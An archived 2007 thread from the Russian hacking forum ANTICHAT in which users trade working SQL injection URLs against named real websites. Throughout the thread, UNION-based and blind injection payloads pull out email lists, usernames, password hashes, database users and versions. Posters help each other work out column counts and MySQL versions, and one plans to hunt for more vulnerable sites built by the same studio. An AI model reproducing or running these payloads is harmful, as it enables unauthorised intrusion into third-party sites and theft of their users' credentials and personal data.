ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.08.2007, 09:43
|
|
Познающий
Регистрация: 29.07.2007
Сообщений: 44
Провел на форуме:
532652
Репутация:
28
|
|
http://m.wazzap.ru/m/photo/?code=46b2bdffwfcodusoij&id=%27
select photo_id, photo_desc from mf_user_photo where user_id=' and photo_visible='Y' LIMIT 0, 5
это иньекция?
|
|
|
15.08.2007, 11:40
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 ruzzer
Вот иньекция
http://m.wazzap.ru/m/photo/?id=-72813%20union%20select%201,TABLE_NAME%20from%20INF ORMATION_SCHEMA.TABLES/*
|
|
|
|
15.08.2007, 15:26
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Небольшая мыльная база 
Код:
http://www.spbgid.ru/index.php?type=-1+union+select+1,mail,3+from+mail/*
+ как всегда, таблица 'news'
З.Ы. Должна быть еще таблица кампаний(тоже с мыльниками), но я не нашел... |
|
|
|
15.08.2007, 15:54
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Слепая sql-inj, кроме таблицы news и колонки n_id ничего не подобрал..., а ещё есть колонки o_id и rc_id, только вот в каких таблицах? Имхо должны быть таблицы авторов и оппонентов, если я правильно понял из самого сайта...
Код:
http://www.ortodoxmedia.com/autor.php?autor=-1+union+select+1,user(),n_id,4,5,version()+from+news+where+n_id=15/*
ЗЫ Может кто копнёт поглубже? Подгузка файла (load_file()) тут сработает?
Код:
http://sololiteratura.com/php/autor.php?id=-1+union+select+user(),version(),null/*
Последний раз редактировалось -=lebed=-; 15.08.2007 в 16:02..
|
|
|
|
15.08.2007, 16:17
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Код:
_http://www.textdiebe.de/werkstatt/autor.php?autor=-1234+union+select+1,2,3,4,user(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
Код:
_http://www.entornoarte.com:81/ea/autor.php?id=-1+union+select+concat(user(),version()),2/*
Чтоб увидеть значения, наведите мышкой на отсутствующий рисунок.
Код:
_http://digital.el-esceptico.org/autor.php?autor=635+order+by+3/* - всё ок!
_http://digital.el-esceptico.org/autor.php?autor=635+order+by+4/* - ошибка!
То есть число столбцов как бы = 3
но почему тогда:
Код:
_http://digital.el-esceptico.org/autor.php?autor=635+union+select+1,2,3/*
The used SELECT statements have a different number of columns
ЗЫ Дак сколько там столбцов?
Последний раз редактировалось -=lebed=-; 15.08.2007 в 17:02..
|
|
|
|
15.08.2007, 18:52
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Код:
http://media.utmn.ru/news.php?show_news=-1+union+select+concat(nick,char(58),pwd,char(58),email)+from+users/*
в поле 'pwd' лежат хеши |
|
|
|
15.08.2007, 19:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от -=lebed=-
Код:
_http://digital.el-esceptico.org/autor.php?autor=635+order+by+3/* - всё ок!
_http://digital.el-esceptico.org/autor.php?autor=635+order+by+4/* - ошибка!
То есть число столбцов как бы = 3
но почему тогда:
Код:
_http://digital.el-esceptico.org/autor.php?autor=635+union+select+1,2,3/*
ЗЫ Дак сколько там столбцов?
Столбцов как бы 3 только вот мускул 3 версии, соответственно union не поддерживает.
|
|
|
|
15.08.2007, 19:51
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
2 geezer.code
неД))
версия 4
http://digital.el-esceptico.org/autor.php?autor=635+and+(ascii(substring(VERSION() ,1,1))=52)
2 -=lebed=-
может там 2 запроса.. в одном 3 столбца, а во втором нет
Последний раз редактировалось halkfild; 15.08.2007 в 19:55..
|
|
|
|
15.08.2007, 19:59
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
а вот тут все ок.. кста потвердилась моя версия
http://digital.el-esceptico.org/leer.php?id=2545&autor=7&tema=-115+union+select+1,CONCAT_WS(CHAR(42),VERSION(),US ER(),DATABASE())/*
4.1.21*eed-lectura@localhost*esceptico |
|
|
|
15.08.2007, 22:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
pr=4
www.solar-ct.com
Код:
http://www.catalogue.solar-ct.com/plugins/catalog/catalog_view.php?id=-23+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_name,user_loginname,user_password,user_email),10,11,12,13,14,15,16,17,18,19+from+solar_user+limit+0,1/*
brigada.uz
Код:
http://brigada.uz/plugins/ansmt/ansmt_view.php?id=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_name,user_loginname,user_password,user_email,user_hideemail,user_join,user_ip,version()),8,9,10,11,12,13,14+from+brigada_user
пароли в хэше... писала одна и та же студия ))) поищу ещще что нить у них.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
